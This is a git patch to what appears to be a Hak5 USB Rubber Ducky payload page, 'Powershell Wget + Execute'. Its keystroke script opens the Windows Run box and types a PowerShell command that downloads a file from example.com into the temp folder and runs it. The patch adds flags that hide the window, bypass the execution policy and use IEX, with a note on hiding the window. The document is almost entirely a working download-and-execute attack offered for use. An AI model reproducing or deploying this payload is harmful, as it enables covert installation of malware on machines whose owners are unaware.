From 072906e2903cf34d6f8760510c6da78598042413 Mon Sep 17 00:00:00 2001
From: Darren Kitchen <darren@hak5.org>
Date: Mon, 7 Nov 2016 14:07:38 -0800
Subject: [PATCH] Updated Payload   powershell wget   execute (rdoc)

---
 Payload---powershell-wget---execute.rdoc | 12 +++---------
 1 file changed, 3 insertions(+), 9 deletions(-)

diff --git a/Payload---powershell-wget---execute.rdoc b/Payload---powershell-wget---execute.rdoc
index db31dd4..31f1548 100644
--- a/Payload---powershell-wget---execute.rdoc
+++ b/Payload---powershell-wget---execute.rdoc
@@ -1,22 +1,16 @@
 Powershell Wget + Execute
 
 Author: mubix
-Duckencoder: 1.2
+Duckencoder: 1.3
 Target: Windows 7
 Description: Opens “RUN” box, throws power shell string, enter. Supports HTTP/S, and proxies.
  GUI r
  DELAY 100
- STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','$env:temp\bob.exe'); Start-Process "$env:temp\bob.exe"
+ STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://example.com/bob.txt',\"$env:temp\bob.exe\"); Start-Process \"$env:temp\bob.exe\""
  ENTER
 
-Adding two words to this makes it possible to hide the powershell window as it downloads and executes. 
+Note -windowstyle hidden hides the powershell window. Also mind the escaped quotes around $env:temp, otherwise the environment variable won't expand.
 
-```
-GUI r
-DELAY 100
-STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','$env:temp\bob.exe'); Start-Process "$env:temp\bob.exe"
-ENTER
-```
 
 
 Edited by: Fahad Alkamli